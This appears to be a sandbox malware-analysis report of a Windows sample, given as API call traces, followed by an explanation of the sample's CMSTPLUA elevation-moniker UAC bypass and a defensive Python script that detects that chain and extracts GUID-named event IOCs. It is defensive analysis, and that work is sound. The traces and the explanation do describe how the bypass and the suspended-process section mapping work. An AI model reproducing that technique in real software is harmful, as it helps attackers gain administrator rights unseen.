• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Process$CurrentHeapWow64
• String ID:
• API String ID: 1399170734-0
APIs
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
• CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Crypt$ContextDestroyHashRelease
• String ID:
• API String ID: 3989222877-0
APIs
  • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
  • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
  • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
  • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0031F6EA
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 3201519519-0
                                                                                                            • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                                                            • Instruction ID: 0369fd50d3347988df83721a07bc235998e90319ebed04f3ae30e5ebfafa8f12
                                                                                                            • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                                                            • Instruction Fuzzy Hash: A721C9B5D00209EFCB09DF98C894AEEB7B5FF48344F108559E825A7381D7349A51CF90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
                                                                                                              • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
                                                                                                              • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                              • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0031F78A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 3201519519-0
                                                                                                            • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                                                            • Instruction ID: a1ef313da2e57933ad43376648b66e34cb17749965216cbcf1b148c43451c55f
                                                                                                            • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                                                            • Instruction Fuzzy Hash: AF21DBB5D0020AEFDB09DF98C884AEEB7B5FF48304F108699E825A7385D7349A51CF90
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002A90E), ref: 0032A955
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 566e694ae996613ac02ba6169d2c4881af4960925bd87e60b028d0e99ae06628
                                                                                                            • Instruction ID: 4963852871ca242c607ca48d4c918a3e0473654f2d6a00c4bc8fe6fe6c7d9179
                                                                                                            • Opcode Fuzzy Hash: 566e694ae996613ac02ba6169d2c4881af4960925bd87e60b028d0e99ae06628
                                                                                                            • Instruction Fuzzy Hash: 0C9002B16A155C5B460217717D4D54626985B48756F530491A101C4254DB9080C1A912
                                                                                                            APIs
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315A98
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315AB4
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315AE4
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B00
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315B30
                                                                                                              • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B4C
                                                                                                            • wnsprintfW.SHLWAPI ref: 00315B7C
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 00315B98
                                                                                                              • Part of subcall function 00312680: RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 0031269B
                                                                                                              • Part of subcall function 00312680: RegDeleteValueW.ADVAPI32(?,00376FC8,?,?,00301109), ref: 003126AE
                                                                                                              • Part of subcall function 00312680: RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126B8
                                                                                                              • Part of subcall function 00312680: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 003126D5
                                                                                                              • Part of subcall function 00312680: RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,00301109), ref: 003126E8
                                                                                                              • Part of subcall function 00312680: RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126F2
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,00315BA8), ref: 0031317A
                                                                                                              • Part of subcall function 00313160: SHGetKnownFolderPath.SHELL32(00337BF0,00000000,00000000,?), ref: 00313196
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 003131B7
                                                                                                              • Part of subcall function 00313160: DeleteFileW.KERNEL32(00000000), ref: 003131C3
                                                                                                              • Part of subcall function 00313160: CoTaskMemFree.COMBASE(?), ref: 003131CD
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 003131D7
                                                                                                              • Part of subcall function 00313160: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003131EA
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003131FF
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 00313229
                                                                                                              • Part of subcall function 00313160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313238
                                                                                                              • Part of subcall function 00313160: __snwprintf.LIBCMT ref: 00313263
                                                                                                              • Part of subcall function 00313160: DeleteFileW.KERNEL32(00000000), ref: 0031326F
                                                                                                              • Part of subcall function 00313160: RemoveDirectoryW.KERNEL32(00000000), ref: 00313279
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 00313283
                                                                                                              • Part of subcall function 00313160: LocalFree.KERNEL32(00000000), ref: 0031328D
                                                                                                              • Part of subcall function 00313160: CoTaskMemFree.COMBASE(?), ref: 00313297
                                                                                                              • Part of subcall function 00312F20: OpenEventW.KERNEL32(00100002,00000000,{B189748B-D39F-48B3-A389-0325B737C49A}), ref: 00312F3F
                                                                                                              • Part of subcall function 00312F20: SetEvent.KERNEL32(00000000), ref: 00312F5B
                                                                                                              • Part of subcall function 00312F20: CloseHandle.KERNEL32(00000000), ref: 00312F68
                                                                                                              • Part of subcall function 00312F20: OpenMutexW.KERNEL32(00100000,00000000,{37C6EA19-2C19-41BB-90A5-BF73BD18C9D4}), ref: 00312F84
                                                                                                              • Part of subcall function 00312F20: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00312FA2
                                                                                                              • Part of subcall function 00312F20: CloseHandle.KERNEL32(00000000), ref: 00312FAF
                                                                                                              • Part of subcall function 00312F20: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 00312FC5
                                                                                                              • Part of subcall function 00312F20: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00312FDA
                                                                                                              • Part of subcall function 00312F20: __snwprintf.LIBCMT ref: 0031301F
                                                                                                              • Part of subcall function 00312F20: lstrlenW.KERNEL32(00000000), ref: 0031302E
                                                                                                              • Part of subcall function 00312F20: _memset.LIBCMT ref: 0031306A
                                                                                                              • Part of subcall function 00312F20: GetFileAttributesW.KERNEL32(00000000), ref: 003130A5
                                                                                                              • Part of subcall function 00312F20: LocalFree.KERNEL32(00000000), ref: 003130F1
                                                                                                              • Part of subcall function 00312F20: CoTaskMemFree.COMBASE(?), ref: 003130FE
                                                                                                              • Part of subcall function 00312E00: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00315BB2,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E13
                                                                                                              • Part of subcall function 00312E00: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,00315BB2), ref: 00312E28
                                                                                                              • Part of subcall function 00312E00: __snwprintf.LIBCMT ref: 00312E61
                                                                                                              • Part of subcall function 00312E00: lstrlenW.KERNEL32(00000000), ref: 00312E6D
                                                                                                              • Part of subcall function 00312E00: _memset.LIBCMT ref: 00312E97
                                                                                                              • Part of subcall function 00312E00: GetFileAttributesW.KERNEL32(00000000), ref: 00312EC0
                                                                                                              • Part of subcall function 00312E00: LocalFree.KERNEL32(00000000), ref: 00312EFD
                                                                                                              • Part of subcall function 00312E00: CoTaskMemFree.COMBASE(00315BB2), ref: 00312F07
                                                                                                              • Part of subcall function 00312AB0: CoInitializeEx.COMBASE(00000000,00000000), ref: 00312AE0
                                                                                                              • Part of subcall function 00312AB0: CoUninitialize.COMBASE ref: 00312DDD
                                                                                                              • Part of subcall function 00310010: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
                                                                                                              • Part of subcall function 00310010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
                                                                                                              • Part of subcall function 00310010: wnsprintfW.SHLWAPI ref: 0031005F
                                                                                                              • Part of subcall function 00310010: lstrlenW.KERNEL32(?), ref: 00310070
                                                                                                              • Part of subcall function 00310010: CoTaskMemFree.COMBASE(?), ref: 0031007F
                                                                                                            • _memset.LIBCMT ref: 00315C2A
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00315C65
                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00315C82
                                                                                                            • LocalFree.KERNEL32(?), ref: 00315CB1
                                                                                                            • _memset.LIBCMT ref: 00315D09
                                                                                                            • __snwprintf.LIBCMT ref: 00315D2E
                                                                                                            • _memset.LIBCMT ref: 00315D4D
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00315D61
                                                                                                            • _memset.LIBCMT ref: 00315D86
                                                                                                            • __snwprintf.LIBCMT ref: 00315DB1
                                                                                                            • __snwprintf.LIBCMT ref: 00315DD5
                                                                                                            • _memset.LIBCMT ref: 00315DF2
                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000044,?), ref: 00315E36
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00315E45
                                                                                                            • DuplicateHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000002), ref: 00315E7D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00315E8C
                                                                                                            • DuplicateHandle.KERNEL32(?,00000218,?,00000000,00000000,00000001,00000002), ref: 00315EC4
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00315EDA
                                                                                                            • _memset.LIBCMT ref: 00315EFE
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00315F14
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00315F2E
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315F48
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F5C
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F70
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F84
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315F98
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315FAC
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00315FBD
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315FD1
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00315FE5
                                                                                                            • LocalFree.KERNEL32(?), ref: 00316079
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031609A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 003160A7
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 003160BF
                                                                                                            • LocalFree.KERNEL32(?), ref: 003160CC
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 003160DE
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003160FA
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316107
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrcpy$Delete__snwprintf_memset$CloseHandle$AllocFile$FolderKnownOpenPathTaskwnsprintf$EventProcesslstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindows
                                                                                                            • String ID: %s%s$0F3$D$LF3$PE3$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsSystem$WindowsSystem.exe${108D3252-20F0-4C1B-940D-6ED5366D8FD3}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${D961EA11-3F69-43D1-8581-E526BBBDC738}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}$E3
                                                                                                            • API String ID: 113497637-1625582440
                                                                                                            • Opcode ID: b8929a10b6a63aeefaf4771b5b49711fc1d31b774b6e312869fcead6df622d34
                                                                                                            • Instruction ID: c384fb7a8418518dc66745dd9bf4f710bb74542c208f27b430ec3a0600284972
                                                                                                            • Opcode Fuzzy Hash: b8929a10b6a63aeefaf4771b5b49711fc1d31b774b6e312869fcead6df622d34
                                                                                                            • Instruction Fuzzy Hash: 912219B5D00228ABDB3ADF50DC89FD9B7B8AB49700F0045D9E60DA6181EB756BC8CF51
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00301CA2
                                                                                                            • _memset.LIBCMT ref: 00301CCC
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00301CE0
                                                                                                            • _memset.LIBCMT ref: 00301D05
                                                                                                              • Part of subcall function 0031C1E0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0030108E), ref: 0031C1EB
                                                                                                              • Part of subcall function 0031C1E0: GetProcAddress.KERNEL32(0030108E,IsWow64Process), ref: 0031C204
                                                                                                            • __snwprintf.LIBCMT ref: 00301D2F
                                                                                                            • __snwprintf.LIBCMT ref: 00301D51
                                                                                                            • _memset.LIBCMT ref: 00301D70
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00301D84
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000DF0), ref: 00301DA3
                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00301DC1
                                                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00301DD9
                                                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00301DF3
                                                                                                            • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 00301E14
                                                                                                            • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00301E2B
                                                                                                            • lstrcpyW.KERNEL32(-00000648,00000000), ref: 00301E42
                                                                                                            • lstrcpyW.KERNEL32(-00000850,{D77DC119-1B4A-41E3-A066-2927413CA76D}), ref: 00301E59
                                                                                                            • lstrcpyW.KERNEL32(-00000A58,?), ref: 00301E73
                                                                                                            • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00301E8A
                                                                                                            • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 00301EA2
                                                                                                            • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 00301EBA
                                                                                                            • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 00301ED1
                                                                                                            • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 00301EE6
                                                                                                            • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00301EFE
                                                                                                              • Part of subcall function 0030A1B0: GetCurrentProcess.KERNEL32 ref: 0030A1B9
                                                                                                              • Part of subcall function 0030A1B0: _memset.LIBCMT ref: 0030A1CA
                                                                                                              • Part of subcall function 0030A1B0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,00302000), ref: 0030A21B
                                                                                                              • Part of subcall function 0030A1B0: NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 0030A251
                                                                                                              • Part of subcall function 0030A1B0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A285
                                                                                                              • Part of subcall function 0030A1B0: NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A290
                                                                                                              • Part of subcall function 0030A1B0: _memmove.LIBCMT ref: 0030A2AF
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00301F78
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00301FA9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00301FB6
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00301FC3
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00301FD9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00301FE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$Handle$Process_memset$AddressCloseCreateCurrentProc$DirectoryLocalModuleSection__snwprintf$AllocEventFreeObjectSingleTerminateViewWaitWindows_memmove
                                                                                                            • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${6EDD6D74-C007-4E75-B76A-E5740995E24C}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${D77DC119-1B4A-41E3-A066-2927413CA76D}
                                                                                                            • API String ID: 326014250-2590975238
                                                                                                            • Opcode ID: 2673536bc5174a3722f5775fbcc3f4d83a26dd55324cabb151e5a3d86161bfa5
                                                                                                            • Instruction ID: a2af1000e6d5a8158e7315ab6f9b11075b72bef17386e598917754d79105c620
                                                                                                            • Opcode Fuzzy Hash: 2673536bc5174a3722f5775fbcc3f4d83a26dd55324cabb151e5a3d86161bfa5
                                                                                                            • Instruction Fuzzy Hash: 9B81A0B4941218ABDB35DB60DC89FEA77BAAB88700F0045D8F209A6280DB759AD4CF54
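The function traced above is the sample's UAC bypass: it stages the string `Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}` (the CMSTPLUA CLSID behind the "UAC Bypass using CMSTP" signature), copies the import names `CoGetObject`, `CoInitialize`, `IIDFromString` and `ExitProcess` into a buffer, spawns `%s\explorer.exe` (or `%s\SysWOW64\explorer.exe`) with `dwCreationFlags = 0x4` (CREATE_SUSPENDED), and maps a section into the new process with `NtCreateSection`/`NtMapViewOfSection`. Resolving the elevation moniker from inside explorer.exe, rather than from the sample itself, is what lets the auto-elevated COM object come up without a consent prompt. The following added example (written for this page, not code from Joe Sandbox or from the sample) parses trace lines in the exact format the report prints and checks for that chain, plus collects the GUID-named events the sample creates or opens as host IOCs. The `TRACE` constant is constructed from lines on this page (two functions combined); the regex, class and function names are assumptions of the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: API-trace lines copied from two functions in this
# report (the explorer.exe elevation-moniker function and the command-execution
# function that signals a named event), in the report's own line format.
TRACE = """
• CreateEventW.KERNEL32(00000000,00000001,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00301CA2
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00301CE0
• GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00301DD9
• lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 00301E2B
• lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 00301E8A
• lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00301EFE
  • Part of subcall function 0030A1B0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,00302000), ref: 0030A21B
  • Part of subcall function 0030A1B0: NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 0030A251
  • Part of subcall function 0030A1B0: NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A290
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00301F78
• OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030C51D
"""

# One trace line: "• API.MODULE(arg,arg,...), ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" and optionally without an argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?"
)
GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}")
ELEVATION_MONIKER = "Elevation:Administrator!new:"
CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit; 6th CreateProcessW argument
NAMED_OBJECT_APIS = {"CreateEventW", "OpenEventW", "CreateMutexW", "OpenMutexW"}


@dataclass
class Call:
    api: str
    module: str
    args: list = field(default_factory=list)
    ref: Optional[str] = None
    sub: Optional[str] = None   # address of the subcall function, if any


def parse_trace(text: str) -> list[Call]:
    """Parse report trace lines into Call records; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Arguments are stack values as printed by the sandbox; "?" means unknown.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def find_uac_bypass_chain(calls: list[Call]) -> tuple[bool, dict]:
    """Flag the chain seen in this report: an elevation moniker string and the
    CoGetObject import name are staged, a process is created CREATE_SUSPENDED,
    and a section is created and mapped into it (NtCreateSection +
    NtMapViewOfSection). Returns (all pieces present, the pieces found)."""
    found: dict = {}
    for c in calls:
        for a in c.args:
            if a.startswith(ELEVATION_MONIKER):
                found["moniker_clsid"] = a[len(ELEVATION_MONIKER):]
            elif a == "CoGetObject":
                found["cogetobject"] = True
        if c.api == "CreateProcessW" and len(c.args) > 5:
            try:
                if int(c.args[5], 16) & CREATE_SUSPENDED:
                    found["suspended_process"] = True
            except ValueError:   # flags printed as "?" in the trace
                pass
        if c.api in ("NtCreateSection", "NtMapViewOfSection"):
            found.setdefault("section_apis", set()).add(c.api)
    complete = (
        {"moniker_clsid", "cogetobject", "suspended_process"}.issubset(found)
        and found.get("section_apis") == {"NtCreateSection", "NtMapViewOfSection"}
    )
    return complete, found


def named_sync_objects(calls: list[Call]) -> dict[str, set[str]]:
    """Collect GUID-named events/mutexes the sample creates or opens; these are
    host-level IOCs that can be probed with OpenEvent/OpenMutex on a live machine."""
    names: dict = {}
    for c in calls:
        if c.api in NAMED_OBJECT_APIS:
            for a in c.args:
                if GUID_RE.fullmatch(a):
                    names.setdefault(a, set()).add(c.api)
    return names


if __name__ == "__main__":
    parsed = parse_trace(TRACE)
    complete, pieces = find_uac_bypass_chain(parsed)
    print("UAC bypass chain complete:", complete, pieces)
    print("named sync objects:", named_sync_objects(parsed))
```

The chain check is a triage aid over the sandbox's printed arguments, not a signature: the values are stack snapshots at call time, and a `?` in the flags position simply leaves that piece unconfirmed. The GUID-named events are the more durable artefact, since the sample reopens the same `{DD700AA6-...}` name from its command-execution function.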
                                                                                                            APIs
